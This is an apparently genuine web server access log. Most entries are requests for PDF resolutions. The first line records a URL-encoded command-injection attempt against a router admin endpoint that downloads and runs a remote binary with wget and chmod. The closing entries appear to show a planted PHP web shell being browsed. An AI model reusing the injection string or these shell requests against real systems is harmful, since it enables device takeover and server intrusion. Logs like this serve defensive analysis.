84.54.51.41 - - [29/Apr/2024:01:49:36 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F94.156.79.193%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1" 404 1018
3.16.50.75 - - [29/Apr/2024:01:49:37 -0500] "GET /BLA/resoluciones/AUTOS%202010/5458.pdf HTTP/1.1" 200 588955
3.224.220.101 - - [29/Apr/2024:01:49:38 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/1624.pdf HTTP/1.1" 200 344508
114.119.132.238 - - [29/Apr/2024:01:49:40 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones/AUTOS%2B1988/&sort=size&order=asc HTTP/1.1" 200 14353
201.245.192.253 - - [29/Apr/2024:01:48:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41015
52.70.240.171 - - [29/Apr/2024:01:49:43 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/3461.pdf HTTP/1.1" 200 463115
18.225.254.22 - - [29/Apr/2024:01:49:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/9072.pdf HTTP/1.1" 200 508449
3.224.220.101 - - [29/Apr/2024:01:49:46 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/1616.pdf HTTP/1.1" 200 344657
18.225.254.22 - - [29/Apr/2024:01:49:46 -0500] "GET /BLA/resoluciones/AUTOS%202022/7271.pdf HTTP/1.1" 200 450027
3.22.222.134 - - [29/Apr/2024:01:49:47 -0500] "GET /BLA/resoluciones/AUTOS%202023/2537.pdf HTTP/1.1" 200 1126950
3.139.236.178 - - [29/Apr/2024:01:49:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/9110.pdf HTTP/1.1" 200 416488
3.139.236.178 - - [29/Apr/2024:01:49:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0192.pdf HTTP/1.1" 200 677088
3.139.236.178 - - [29/Apr/2024:01:49:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/0028.pdf HTTP/1.1" 200 373937
3.139.236.178 - - [29/Apr/2024:01:49:50 -0500] "GET /BLA/resoluciones/AUTOS%202022/6984.pdf HTTP/1.1" 200 399028
3.139.236.178 - - [29/Apr/2024:01:49:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/2645.pdf HTTP/1.1" 200 278564
3.224.220.101 - - [29/Apr/2024:01:49:51 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/3458.pdf HTTP/1.1" 200 470920
3.139.236.178 - - [29/Apr/2024:01:49:51 -0500] "GET /BLA/resoluciones/AUTOS%202018/1385.pdf HTTP/1.1" 200 295658
52.70.240.171 - - [29/Apr/2024:01:49:54 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/1613.pdf HTTP/1.1" 200 348344
47.128.39.40 - - [29/Apr/2024:01:49:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cmaderas%5Cimages%5C&f=page89_thumbnail.jpg&imgsize=100 HTTP/1.1" 200 16100
47.128.39.40 - - [29/Apr/2024:01:49:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.39.40 - - [29/Apr/2024:01:49:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.39.40 - - [29/Apr/2024:01:49:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_jpg HTTP/1.1" 200 175
47.128.39.40 - - [29/Apr/2024:01:49:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.39.40 - - [29/Apr/2024:01:49:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.39.40 - - [29/Apr/2024:01:49:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.39.40 - - [29/Apr/2024:01:49:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.39.40 - - [29/Apr/2024:01:49:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
